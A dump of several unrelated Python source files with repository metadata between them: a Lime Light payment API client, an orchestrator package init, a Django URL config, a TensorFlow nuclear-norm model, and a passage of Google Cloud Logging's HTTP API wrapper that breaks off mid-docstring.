from urlparse import parse_qs
from requests import post, get, ConnectionError, Timeout
from requests.packages.urllib3.exceptions import ProtocolError
from voluptuous import Schema, MultipleInvalid
from . import utils, errors
class Request(object):
"""
The superclass of all Lime Light API methods.
"""
TIMEOUT = 12
MAX_TRIES = 3
VERIFY_CERT = True
preserve_field_labels = None
http_method = 'POST'
schema = utils.not_implemented
endpoint = utils.not_implemented
error = utils.not_implemented
handle_errors = utils.func_not_implemented
def __init__(self, host=None, username=None, password=None, **kwargs):
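        """
        Validate ``kwargs`` against ``schema``, send the request to Lime Light and
        process the response, raising for validation, connection or API errors.
        """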
self.host = host
self.username = username
self.password = password
if kwargs.get('http_method'):
self.http_method = kwargs['http_method']
try:
cleaned_data = Schema(self.schema)(kwargs)
except MultipleInvalid as e:
raise errors.ValidationError(e)
preprocessed_data = self.__preprocess_data(cleaned_data)
self.response = self.__make_request(preprocessed_data)
self.__process_response()
self.__handle_errors()
def __preprocess_data(self, unprocessed_data):
"""
:param unprocessed_data: Data that is about to be send to Lime Light
:type unprocessed_data: dict
:return: Data ready to be transmitted
:rtype: dict
"""
if unprocessed_data.get('tran_type') and unprocessed_data.get('cvv'):
unprocessed_data['CVV'] = unprocessed_data.pop('cvv')
if self.preserve_field_labels is not None:
data = {}
for key, value in unprocessed_data.items():
if key in self.preserve_field_labels:
data[key] = value
else:
data[utils.to_camel_case(key)] = value
else:
data = copy(unprocessed_data)
data.update(method=self.__name__,
username=self.username,
password=self.password)
return data
def __make_request(self, request_data, tried=0):
"""
:param request_data: Data being sent over to Lime Light
:type request_data: dict
:param tried: The number of times the request has been tried so far. By default,
``__make_request`` will attempt a request three times before giving up
:type tried: int
:return: Lime Light's response
:rtype: requests.Response
:raises: limelight.errors.ConnectionError
"""
try:
if self.http_method.upper() == 'POST':
return post(self.endpoint, data=request_data, timeout=self.TIMEOUT,
verify=self.VERIFY_CERT)
elif self.http_method.upper() == 'GET':
return get(self.endpoint, params=request_data, timeout=self.TIMEOUT,
verify=self.VERIFY_CERT)
else:
msg = '`{cls}.http_method` must be one of `GET` or `POST`'.format(cls=self.__name__)
raise errors.ImproperlyConfigured(msg)
except (Timeout, ConnectionError, ProtocolError) as e:
if tried <= self.MAX_TRIES:
return self.__make_request(request_data, tried=tried + 1)
else:
raise errors.ConnectionError(e)
def __process_response(self):
"""
:rtype: None
"""
try:
response_data = self.response.json()
except ValueError:
response_data = parse_qs(self.response.text)
for key, value in response_data.items():
setattr(self, utils.to_underscore(key), utils.to_python(value))
# noinspection PyUnresolvedReferences
def __handle_errors(self):
"""Handles generic Lime Light errors"""
try:
self.handle_errors()
except (AttributeError, NotImplementedError):
if self.error_found:
response_code = getattr(self, 'response_code', '000')
error_message = getattr(self, 'error_message',
'An unspecified error occurred, try again.')
raise errors.LimeLightException("{code}: {message}".format(code=response_code,
message=error_message),
response=self)
class TransactionMethod(Request):
"""
Superclass of all Transaction API methods
"""
Declined = errors.TransactionDeclined
preserve_field_labels = {'click_id', 'preserve_force_gateway', 'thm_session_id',
'total_installments', 'alt_pay_token', 'alt_pay_payer_id',
'force_subscription_cycle', 'recurring_days', 'subscription_week',
'subscription_day', 'master_order_id', 'temp_customer_id',
'auth_amount', 'cascade_enabled', 'save_customer', }
def __init__(self, **kwargs):
if self.__name__ != 'NewProspect':
kwargs['tran_type'] = 'Sale'
super(TransactionMethod, self).__init__(**kwargs)
# noinspection PyUnresolvedReferences
def handle_errors(self):
"""
Raises exceptions for Transaction API-related errors.
"""
if self.error_found:
if self.response_code == 800:
raise self.Declined(self.decline_reason,
response=self)
else:
pass
@property
def endpoint(self):
"""
:return: API endpoint
:rtype: str
"""
return "https://{host}/admin/transact.php".format(host=self.host)
class MembershipMethod(Request):
"""
Superclass of all Membership API methods
"""
@property
def endpoint(self):
"""
:return: API endpoint
:rtype: str
"""
return "https://{host}/admin/membership.php".format(host=self.host)
| 36.310345
| 100
| 0.591168
|
8bfcfbc5b00bd1fe1723918ddeefb1d20c6eb27d
| 1,095
|
py
|
Python
|
orchestrator/__init__.py
|
florisie/orchestrator-core
|
7a5a997fc809cdf53dc942d1ee1fa945de4eb4d8
|
[
"Apache-2.0"
] | null | null | null |
orchestrator/__init__.py
|
florisie/orchestrator-core
|
7a5a997fc809cdf53dc942d1ee1fa945de4eb4d8
|
[
"Apache-2.0"
] | null | null | null |
orchestrator/__init__.py
|
florisie/orchestrator-core
|
7a5a997fc809cdf53dc942d1ee1fa945de4eb4d8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019-2020 SURF.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This is the orchestrator workflow engine."""
__version__ = "0.3.4"
from orchestrator.app import OrchestratorCore
from orchestrator.settings import app_settings, oauth2_settings
from orchestrator.workflow import begin, conditional, done, focussteps, inputstep, retrystep, step, steplens, workflow
__all__ = [
"OrchestratorCore",
"app_settings",
"oauth2_settings",
"step",
"inputstep",
"workflow",
"retrystep",
"begin",
"done",
"conditional",
"focussteps",
"steplens",
]
| 30.416667
| 118
| 0.730594
|
cc8a48a40eadd9323bd3947adc01d6fbad4d2034
| 122
|
py
|
Python
|
user_profile/urls.py
|
avinashkranjan/CGS-Centralized_Grading_System
|
60d63eb8266668f16258bd99eaef428933ea5ef7
|
[
"CC0-1.0"
] | null | null | null |
user_profile/urls.py
|
avinashkranjan/CGS-Centralized_Grading_System
|
60d63eb8266668f16258bd99eaef428933ea5ef7
|
[
"CC0-1.0"
] | 2
|
2020-09-05T12:29:37.000Z
|
2020-09-06T18:11:37.000Z
|
user_profile/urls.py
|
avinashkranjan/CGS-Centralized_Grading_System
|
60d63eb8266668f16258bd99eaef428933ea5ef7
|
[
"CC0-1.0"
] | 1
|
2020-09-04T17:23:11.000Z
|
2020-09-04T17:23:11.000Z
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.profile_view, name="profile_page"),
]
| 20.333333
| 54
| 0.713115
|
2e960f330785dc234e705ead1ad7117067078cfa
| 2,759
|
py
|
Python
|
utils/models/nuclear_models.py
|
diptanshumittal/FCO-ICML21
|
4a9f4456cb7e1c3a0646c9b91a0926ba87fc6a48
|
[
"Apache-2.0"
] | 4
|
2021-06-07T18:34:52.000Z
|
2021-10-05T13:20:16.000Z
|
utils/models/nuclear_models.py
|
diptanshumittal/FCO-ICML21
|
4a9f4456cb7e1c3a0646c9b91a0926ba87fc6a48
|
[
"Apache-2.0"
] | null | null | null |
utils/models/nuclear_models.py
|
diptanshumittal/FCO-ICML21
|
4a9f4456cb7e1c3a0646c9b91a0926ba87fc6a48
|
[
"Apache-2.0"
] | 4
|
2021-12-20T18:40:31.000Z
|
2022-03-24T12:28:08.000Z
|
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build a model for nuclear-regularized Least-Squares Regression."""
# from abc import abstractmethod
import tensorflow as tf
from optimization.shared import projector_utils
class NuclearDense(tf.keras.layers.Dense):
# this is not functional in TFF... from_keras_model won't accept subclass model
def __init__(self, units, n_row, rank_real=None, nnz_cutoff=1e-4, lambd=0.0, **kwargs):
# n_col = n_row for simplicity
self.n_row = n_row
self.lambd = lambd
self.rank_real = rank_real
self.nnz_cutoff = nnz_cutoff
super(NuclearDense, self).__init__(units, **kwargs)
def call(self, inputs, training=None):
if not training:
kernel_matrix = tf.reshape(self.kernel, (self.n_row, self.n_row))
singular_vals, _, _ = tf.linalg.svd(kernel_matrix)
nuc = tf.reduce_sum(singular_vals)
reg_loss = self.lambd * nuc
rank = tf.math.count_nonzero(singular_vals > self.nnz_cutoff)
self.add_metric(nuc, name=self.name+'_nuc', aggregation = 'mean')
self.add_metric(reg_loss, name=self.name+'_reg_loss', aggregation='mean')
self.add_metric(tf.cast(rank,tf.float32), name='rank', aggregation='mean')
if self.rank_real is not None:
ground_truth = tf.linalg.diag(
[1.0]*self.rank_real+[0.0]*(self.n_row-self.rank_real))
err_fro = tf.norm(ground_truth-kernel_matrix)
# need aggregation due to https://github.com/tensorflow/tensorflow/blob/v2.3.0/tensorflow/python/keras/engine/base_layer_v1.py#L1896
self.add_metric(err_fro, name='err_fro', aggregation='mean')
return super(NuclearDense, self).call(inputs)
def create_nuclear_model(n_row, rank_real=None, nnz_cutoff=1e-4):
"""Create a Least Squares Base Model (for federated) with nuclear regularization
Args:
use_bias: A boolean that determines whether to use bias for the Logistic linear.
Returns:
A `tf.keras.Model`.
"""
model = tf.keras.models.Sequential([
NuclearDense(1,
name='dense',
input_shape=(n_row*n_row,),
n_row = n_row,
rank_real=rank_real,
nnz_cutoff=nnz_cutoff,
**(projector_utils.get_lambd()))
])
return model
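# Illustrative usage sketch (the numbers below are arbitrary examples, not from the original code):
#   model = create_nuclear_model(n_row=20, rank_real=5)
#   model.compile(optimizer='sgd', loss='mse')
# The model takes flattened n_row*n_row inputs, emits a single regression output, and reports the
# nuclear-norm, rank and (when rank_real is given) Frobenius-error metrics added by NuclearDense
# at evaluation time.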
| 36.302632
| 140
| 0.707865
|
e3acb892793f78b2c48269ad99f0d51ec6234dac
| 160
|
py
|
Python
|
popupdict/speech/client/__init__.py
|
hantaotaohan/popup-dict
|
9eb05fd9797a14323c9b1166f916778b32e933bc
|
[
"MIT"
] | 85
|
2018-02-23T07:16:27.000Z
|
2022-03-26T19:53:48.000Z
|
popupdict/speech/client/__init__.py
|
glMa7/popup-dict
|
dbf9121aa63d65095bd848a582595e1b03327418
|
[
"MIT"
] | 12
|
2018-02-23T07:45:34.000Z
|
2020-03-10T03:20:03.000Z
|
popupdict/speech/client/__init__.py
|
glMa7/popup-dict
|
dbf9121aa63d65095bd848a582595e1b03327418
|
[
"MIT"
] | 16
|
2018-01-02T02:07:50.000Z
|
2021-12-17T08:01:00.000Z
|
from .youdao import YoudaoSpeechClient
valid_speech_clients = [
YoudaoSpeechClient,
]
__all__ = [
'valid_speech_clients',
'YoudaoSpeechClient',
]
| 14.545455
| 38
| 0.73125
|
3936c00edc4ee840c1f8ddaffbd26684fe995d81
| 4,673
|
py
|
Python
|
build/lib/infapy/v3/users.py
|
infapy/infapy
|
0cb11310130be70ce1b647aa5ede929c1eb9b2ce
|
[
"Apache-2.0"
] | null | null | null |
build/lib/infapy/v3/users.py
|
infapy/infapy
|
0cb11310130be70ce1b647aa5ede929c1eb9b2ce
|
[
"Apache-2.0"
] | null | null | null |
build/lib/infapy/v3/users.py
|
infapy/infapy
|
0cb11310130be70ce1b647aa5ede929c1eb9b2ce
|
[
"Apache-2.0"
] | 1
|
2021-09-23T10:31:56.000Z
|
2021-09-23T10:31:56.000Z
|
import infapy
import requests as re
from infapy.exceptions import InvalidUserDetailsProvided
class Users:
def __init__(self,v3,v3BaseURL,v3SessionID):
self._v3 = v3
self._v3BaseURL = v3BaseURL
self._v3SessionID = v3SessionID
def getAllUsers(self):
"""getAllUsers can be used to fetch all the user details in you iics org
Returns:
infaUserData: <list of dict>
"""
infapy.log.info("getting all user details. Processing request....")
url=self._v3BaseURL + "/public/core/v3/users"
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
infapy.log.info("get users API URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: " + "This API requires no body")
try:
response = re.get(url=url, headers=headers)
infapy.log.debug(str(response.json()))
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Fetched the all the user details from IICS")
data = response.json()
infapy.log.info("getAllUsers() called successfully. Processing completed")
return data
def getUserByID(self,id):
"""We can use this method to get the user details of a particular user
Args:
id (string): you can use the user id to get the details
Returns:
json: infaUserDetails
"""
infapy.log.info("getting details of user id " + str(id) + " . Processing request....")
url=self._v3BaseURL + "/public/core/v3/users?q=userId=="+str(id)+"&limit=1&skip=0"
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
infapy.log.info("get users API URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: " + "This API requires no body")
try:
response = re.get(url=url, headers=headers)
infapy.log.debug(str(response.json()))
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Fetched the user details of user id: " + id + " from IICS")
data = response.json()
infapy.log.info("getAllUsers() called successfully. Processing completed")
return data
def createNewUser(self,userProfileInJson):
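        """createNewUser can be used to create a new user in your IICS org
        Args:
            userProfileInJson (json): user profile as expected by the v3 users REST API
        Returns:
            json: response returned by the create user API call
        """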
infapy.log.info("Creating new user..")
infapy.log.info("User Profile provided: " + str(userProfileInJson))
url=self._v3BaseURL + "/public/core/v3/users"
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
body = userProfileInJson
infapy.log.info("get users API URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: " + str(userProfileInJson))
try:
response = re.post(url=url, json=body, headers=headers)
data = response.json()
infapy.log.debug(str(data))
try:
if ("error" in data):
infapy.log.error("please validate the json string and provide a valid json")
infapy.log.error("User Creation failed")
infapy.log.error(str(data))
raise InvalidUserDetailsProvided
except Exception as e:
infapy.log.exception(e)
raise
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Created New User Successfully")
infapy.log.info("createNewUser completed successfully..")
return data
def deleteUser(self,userID):
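        """deleteUser can be used to delete an existing user in your IICS org
        Args:
            userID (string): id of the user to be deleted
        """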
infapy.log.info("Deleting user id: " + str(userID))
url=self._v3BaseURL + "/public/core/v3/users/" + str(userID)
headers = {'Content-Type': "application/json", 'Accept': "application/json","INFA-SESSION-ID":self._v3SessionID}
infapy.log.info("Delete User URL - " + url)
infapy.log.info("API Headers: " + str(headers))
infapy.log.info("Body: There are no headers for this request" )
try:
response = re.delete(url=url, headers=headers)
# data = response.json()
infapy.log.debug(str(response))
except Exception as e:
infapy.log.exception(e)
raise
infapy.log.info("Delete user successfully")
# infapy.log.info(str(data))
infapy.log.info("deleteUser completed successfully..")
# return data
| 39.268908
| 120
| 0.598117
|
d3f0638c6973bfe494c250cc9a8caaef71e23d21
| 4,647
|
py
|
Python
|
cloudbaseinit/tests/plugins/windows/test_ntpclient.py
|
andia10240/cloudbase-init
|
3c290194c139990f2a0e5747aa2f6c9554d26659
|
[
"Apache-2.0"
] | 160
|
2015-01-09T14:45:59.000Z
|
2022-03-15T09:15:12.000Z
|
cloudbaseinit/tests/plugins/windows/test_ntpclient.py
|
andia10240/cloudbase-init
|
3c290194c139990f2a0e5747aa2f6c9554d26659
|
[
"Apache-2.0"
] | 95
|
2015-01-25T15:22:05.000Z
|
2022-03-16T10:40:27.000Z
|
cloudbaseinit/tests/plugins/windows/test_ntpclient.py
|
andia10240/cloudbase-init
|
3c290194c139990f2a0e5747aa2f6c9554d26659
|
[
"Apache-2.0"
] | 86
|
2015-01-19T17:19:35.000Z
|
2022-03-24T09:21:55.000Z
|
# Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit import exception
from cloudbaseinit.plugins.windows import ntpclient
CONF = cloudbaseinit_conf.CONF
class NTPClientPluginTests(unittest.TestCase):
def setUp(self):
self._ntpclient = ntpclient.NTPClientPlugin()
def test_set_ntp_trigger_mode(self):
mock_osutils = mock.Mock()
self._ntpclient._set_ntp_trigger_mode(mock_osutils)
args = [
mock.call.execute_system32_process(
["sc.exe", "triggerinfo", ntpclient._W32TIME_SERVICE,
"delete"]),
mock.call.execute_system32_process(
["sc.exe", "triggerinfo", ntpclient._W32TIME_SERVICE,
"start/networkon", "stop/networkoff"])
]
mock_osutils.assert_has_calls(args)
@mock.patch('time.sleep')
@mock.patch('cloudbaseinit.plugins.windows.ntpclient.NTPClientPlugin.'
'_set_ntp_trigger_mode')
def _test_check_w32time_svc_status(self, mock_set_ntp_trigger_mode,
mock_sleep, start_mode,
fail_service_start,
patch_check_os_version=True):
# TODO(rtingirica): use _W32TIME_SERVICE when it will be moved outside
# of method declaration
mock_osutils = mock.MagicMock()
mock_osutils.SERVICE_START_MODE_AUTOMATIC = "Automatic"
mock_osutils.SERVICE_STATUS_RUNNING = "running"
mock_osutils.SERVICE_STATUS_STOPPED = "stopped"
mock_osutils.get_service_start_mode.return_value = start_mode
mock_osutils.check_os_version.return_value = patch_check_os_version
if fail_service_start:
mock_osutils.get_service_status.return_value = "stopped"
self.assertRaises(exception.CloudbaseInitException,
self._ntpclient.verify_time_service,
mock_osutils)
else:
mock_osutils.get_service_status.side_effect = [
"stopped", mock_osutils.SERVICE_STATUS_RUNNING]
self._ntpclient.verify_time_service(osutils=mock_osutils)
if start_mode != mock_osutils.SERVICE_START_MODE_AUTOMATIC:
mock_osutils.set_service_start_mode.assert_called_once_with(
ntpclient._W32TIME_SERVICE,
mock_osutils.SERVICE_START_MODE_AUTOMATIC)
mock_sleep.assert_called_once_with(1)
mock_osutils.start_service.assert_called_once_with(
ntpclient._W32TIME_SERVICE)
mock_osutils.get_service_start_mode.assert_called_once_with(
ntpclient._W32TIME_SERVICE)
mock_osutils.get_service_status.assert_called_with(
ntpclient._W32TIME_SERVICE)
mock_osutils.check_os_version.assert_called_once_with(6, 1)
if patch_check_os_version:
mock_set_ntp_trigger_mode.assert_called_once_with(mock_osutils)
else:
self.assertFalse(mock_set_ntp_trigger_mode.called)
def test_check_w32time_svc_status_other_start_mode(self):
self._test_check_w32time_svc_status(start_mode="not automatic",
fail_service_start=False)
def test_check_w32time_svc_status_start_automatic(self):
self._test_check_w32time_svc_status(start_mode="automatic",
fail_service_start=False)
def test_check_w32time_svc_status_exception(self):
self._test_check_w32time_svc_status(start_mode="automatic",
fail_service_start=True)
def test_check_w32time_older_oses(self):
self._test_check_w32time_svc_status(start_mode="automatic",
fail_service_start=False,
patch_check_os_version=False)
| 41.864865
| 78
| 0.665376
|
1bad382db7605ff8a40525fcd157de8652c15ffd
| 806
|
py
|
Python
|
statetrace_django/admin.py
|
SoCal-Software-Labs/statetrace_django
|
9fd1e58527ed8a129fd62ae733784c14ceb07b63
|
[
"MIT"
] | 1
|
2021-07-29T13:36:43.000Z
|
2021-07-29T13:36:43.000Z
|
statetrace_django/admin.py
|
SoCal-Software-Labs/statetrace_django
|
9fd1e58527ed8a129fd62ae733784c14ceb07b63
|
[
"MIT"
] | null | null | null |
statetrace_django/admin.py
|
SoCal-Software-Labs/statetrace_django
|
9fd1e58527ed8a129fd62ae733784c14ceb07b63
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.conf import settings
class StateTraceAdmin(admin.ModelAdmin):
change_form_template = "statetrace_django/change_form.html"
def change_view(self, request, object_id, form_url="", extra_context=None):
extra_context = {
**(extra_context or {}),
**{
"staterace_search_base_url": getattr(
settings,
"STATETRACE_SEARCH_URL",
"http://localhost:4000/organizations/1/environments/1/db/1/outbound/1/search",
),
"statetrace_object_pk": object_id,
"statetrace_table_name": self.model._meta.db_table,
},
}
return super().change_view(request, object_id, form_url, extra_context)
| 33.583333
| 98
| 0.600496
|
0838e7fe42acc1d725502c48fdc45727b2676329
| 17,762
|
py
|
Python
|
logging/google/cloud/logging/_http.py
|
ricardolui/google-cloud-python
|
c82cd6bb7a42f61893ff29e0570249124a8aca61
|
[
"Apache-2.0"
] | 1
|
2017-05-18T06:58:48.000Z
|
2017-05-18T06:58:48.000Z
|
logging/google/cloud/logging/_http.py
|
ricardolui/google-cloud-python
|
c82cd6bb7a42f61893ff29e0570249124a8aca61
|
[
"Apache-2.0"
] | null | null | null |
logging/google/cloud/logging/_http.py
|
ricardolui/google-cloud-python
|
c82cd6bb7a42f61893ff29e0570249124a8aca61
|
[
"Apache-2.0"
] | 1
|
2022-03-24T01:37:10.000Z
|
2022-03-24T01:37:10.000Z
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interact with Stackdriver Logging via JSON-over-HTTP."""
import functools
from google.cloud import _http
from google.cloud.iterator import HTTPIterator
from google.cloud.logging import __version__
from google.cloud.logging._helpers import entry_from_resource
from google.cloud.logging.sink import Sink
from google.cloud.logging.metric import Metric
_CLIENT_INFO = _http.CLIENT_INFO_TEMPLATE.format(__version__)
class Connection(_http.JSONConnection):
"""A connection to Google Stackdriver Logging via the JSON REST API.
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client that owns the current connection.
"""
API_BASE_URL = 'https://logging.googleapis.com'
"""The base of the API call URL."""
API_VERSION = 'v2'
"""The version of the API, used in building the API call's URL."""
API_URL_TEMPLATE = '{api_base_url}/{api_version}{path}'
"""A template for the URL of a particular API call."""
_EXTRA_HEADERS = {
_http.CLIENT_INFO_HEADER: _CLIENT_INFO,
}
class _LoggingAPI(object):
"""Helper mapping logging-related APIs.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.logs
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client used to make API requests.
"""
def __init__(self, client):
self._client = client
self.api_request = client._connection.api_request
def list_entries(self, projects, filter_=None, order_by=None,
page_size=None, page_token=None):
"""Return a page of log entry resources.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries/list
:type projects: list of strings
:param projects: project IDs to include. If not passed,
defaults to the project bound to the client.
:type filter_: str
:param filter_:
a filter expression. See:
https://cloud.google.com/logging/docs/view/advanced_filters
:type order_by: str
:param order_by: One of :data:`~google.cloud.logging.ASCENDING`
or :data:`~google.cloud.logging.DESCENDING`.
:type page_size: int
        :param page_size: maximum number of entries to return. If not passed,
defaults to a value set by the API.
:type page_token: str
:param page_token: opaque marker for the next "page" of entries. If not
passed, the API will return the first page of
entries.
:rtype: :class:`~google.cloud.iterator.Iterator`
:returns: Iterator of :class:`~google.cloud.logging.entries._BaseEntry`
accessible to the current API.
"""
extra_params = {'projectIds': projects}
if filter_ is not None:
extra_params['filter'] = filter_
if order_by is not None:
extra_params['orderBy'] = order_by
if page_size is not None:
extra_params['pageSize'] = page_size
path = '/entries:list'
# We attach a mutable loggers dictionary so that as Logger
# objects are created by entry_from_resource, they can be
# re-used by other log entries from the same logger.
loggers = {}
item_to_value = functools.partial(
_item_to_entry, loggers=loggers)
iterator = HTTPIterator(
client=self._client, path=path,
item_to_value=item_to_value, items_key='entries',
page_token=page_token, extra_params=extra_params)
# This method uses POST to make a read-only request.
iterator._HTTP_METHOD = 'POST'
return iterator
def write_entries(self, entries, logger_name=None, resource=None,
labels=None):
"""API call: log an entry resource via a POST request
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/entries/write
:type entries: sequence of mapping
:param entries: the log entry resources to log.
:type logger_name: str
:param logger_name: name of default logger to which to log the entries;
individual entries may override.
:type resource: mapping
:param resource: default resource to associate with entries;
individual entries may override.
:type labels: mapping
:param labels: default labels to associate with entries;
individual entries may override.
"""
data = {'entries': list(entries)}
if logger_name is not None:
data['logName'] = logger_name
if resource is not None:
data['resource'] = resource
if labels is not None:
data['labels'] = labels
self.api_request(method='POST', path='/entries:write', data=data)
def logger_delete(self, project, logger_name):
"""API call: delete all entries in a logger via a DELETE request
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.logs/delete
:type project: str
:param project: ID of project containing the log entries to delete
:type logger_name: str
:param logger_name: name of logger containing the log entries to delete
"""
path = '/projects/%s/logs/%s' % (project, logger_name)
self.api_request(method='DELETE', path=path)
class _SinksAPI(object):
"""Helper mapping sink-related APIs.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client used to make API requests.
"""
def __init__(self, client):
self._client = client
self.api_request = client._connection.api_request
def list_sinks(self, project, page_size=None, page_token=None):
"""List sinks for the project associated with this client.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/list
:type project: str
:param project: ID of the project whose sinks are to be listed.
:type page_size: int
        :param page_size: maximum number of sinks to return. If not passed,
defaults to a value set by the API.
:type page_token: str
:param page_token: opaque marker for the next "page" of sinks. If not
passed, the API will return the first page of
sinks.
:rtype: :class:`~google.cloud.iterator.Iterator`
:returns: Iterator of
:class:`~google.cloud.logging.sink.Sink`
accessible to the current API.
"""
extra_params = {}
if page_size is not None:
extra_params['pageSize'] = page_size
path = '/projects/%s/sinks' % (project,)
return HTTPIterator(
client=self._client, path=path,
item_to_value=_item_to_sink, items_key='sinks',
page_token=page_token, extra_params=extra_params)
def sink_create(self, project, sink_name, filter_, destination):
"""API call: create a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/create
:type project: str
:param project: ID of the project in which to create the sink.
:type sink_name: str
:param sink_name: the name of the sink
:type filter_: str
:param filter_: the advanced logs filter expression defining the
entries exported by the sink.
:type destination: str
:param destination: destination URI for the entries exported by
the sink.
"""
target = '/projects/%s/sinks' % (project,)
data = {
'name': sink_name,
'filter': filter_,
'destination': destination,
}
self.api_request(method='POST', path=target, data=data)
def sink_get(self, project, sink_name):
"""API call: retrieve a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/get
:type project: str
:param project: ID of the project containing the sink.
:type sink_name: str
:param sink_name: the name of the sink
:rtype: dict
:returns: The JSON sink object returned from the API.
"""
target = '/projects/%s/sinks/%s' % (project, sink_name)
return self.api_request(method='GET', path=target)
def sink_update(self, project, sink_name, filter_, destination):
"""API call: update a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/update
:type project: str
:param project: ID of the project containing the sink.
:type sink_name: str
:param sink_name: the name of the sink
:type filter_: str
:param filter_: the advanced logs filter expression defining the
entries exported by the sink.
:type destination: str
:param destination: destination URI for the entries exported by
the sink.
:rtype: dict
:returns: The returned (updated) resource.
"""
target = '/projects/%s/sinks/%s' % (project, sink_name)
data = {
'name': sink_name,
'filter': filter_,
'destination': destination,
}
return self.api_request(method='PUT', path=target, data=data)
def sink_delete(self, project, sink_name):
"""API call: delete a sink resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.sinks/delete
:type project: str
:param project: ID of the project containing the sink.
:type sink_name: str
:param sink_name: the name of the sink
"""
target = '/projects/%s/sinks/%s' % (project, sink_name)
self.api_request(method='DELETE', path=target)
class _MetricsAPI(object):
"""Helper mapping sink-related APIs.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics
:type client: :class:`~google.cloud.logging.client.Client`
:param client: The client used to make API requests.
"""
def __init__(self, client):
self._client = client
self.api_request = client._connection.api_request
def list_metrics(self, project, page_size=None, page_token=None):
"""List metrics for the project associated with this client.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/list
:type project: str
:param project: ID of the project whose metrics are to be listed.
:type page_size: int
        :param page_size: maximum number of metrics to return. If not passed,
defaults to a value set by the API.
:type page_token: str
:param page_token: opaque marker for the next "page" of metrics. If not
passed, the API will return the first page of
metrics.
:rtype: :class:`~google.cloud.iterator.Iterator`
:returns: Iterator of
:class:`~google.cloud.logging.metric.Metric`
accessible to the current API.
"""
extra_params = {}
if page_size is not None:
extra_params['pageSize'] = page_size
path = '/projects/%s/metrics' % (project,)
return HTTPIterator(
client=self._client, path=path,
item_to_value=_item_to_metric, items_key='metrics',
page_token=page_token, extra_params=extra_params)
def metric_create(self, project, metric_name, filter_, description=None):
"""API call: create a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/create
:type project: str
:param project: ID of the project in which to create the metric.
:type metric_name: str
:param metric_name: the name of the metric
:type filter_: str
:param filter_: the advanced logs filter expression defining the
entries exported by the metric.
:type description: str
:param description: description of the metric.
"""
target = '/projects/%s/metrics' % (project,)
data = {
'name': metric_name,
'filter': filter_,
'description': description,
}
self.api_request(method='POST', path=target, data=data)
def metric_get(self, project, metric_name):
"""API call: retrieve a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/get
:type project: str
:param project: ID of the project containing the metric.
:type metric_name: str
:param metric_name: the name of the metric
:rtype: dict
:returns: The JSON metric object returned from the API.
"""
target = '/projects/%s/metrics/%s' % (project, metric_name)
return self.api_request(method='GET', path=target)
def metric_update(self, project, metric_name, filter_, description):
"""API call: update a metric resource.
See:
https://cloud.google.com/logging/docs/reference/v2/rest/v2/projects.metrics/update
:type project: str
:param project: ID of the project containing the metric.
:type metric_name: str
:param metric_name: the name of the metric
:type filter_: str
